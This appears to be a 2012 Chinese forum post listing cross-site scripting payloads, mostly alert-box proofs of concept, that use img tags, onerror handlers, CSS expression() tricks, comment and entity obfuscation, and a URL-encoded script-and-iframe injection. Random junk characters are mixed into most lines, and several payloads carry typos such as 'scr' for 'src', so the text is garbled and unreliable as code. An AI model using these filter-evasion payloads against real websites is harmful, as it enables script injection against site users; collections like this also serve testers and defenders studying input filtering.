<script>alert("跨站")</script> (最常用)
7 R, V, b: W% D4 |' k+ e<img scr=javascript:alert("跨站")></img>
8 E7 z) X- |/ |3 j( M<img scr="javascript: alert(/跨站/)></img>
- _% N: o7 E: r<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格): o+ p4 h% [ c* F7 _- s, I
<img scr="#" onerror=alert(/跨站/)></img>
& ?; R; q/ d5 F- w' C" P<img scr="#" style="xss:expression(alert(/xss/));"></img>
( F5 b1 Q+ O) X4 V: v<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
' ?" |4 P4 S5 {* Z/ X- F1 ]<img src=vbscript:msgbox ("xss")></img>* C/ p$ h0 w9 D+ a' P
<style> input {left:expression (alert('xss'))}</style>
& {2 r: ]# o3 l0 b! H<div style={left:expression (alert('xss'))}></div>7 ?/ ?7 \. n4 w3 b
<div style={left:exp/* */ression (alert('xss'))}></div>
) r" v& X- ?1 J; `0 E# X0 p<div style={left:\0065\0078ression (alert('xss'))}></div>- d5 r* G* a: f! d# m: A5 l l* ^/ H
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>+ H2 t; ]) J B* r" @% x, j
unicode <div style="{left:expRessioN (alert('xss'))}">( X+ x# F# S- q; s& o* y3 D6 ?
, D9 m# U% [, p3 i( P"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
% D2 V. [$ ]; ~* i3 Y |
发表于 2012-9-15 14:09:13
收藏
支持
反对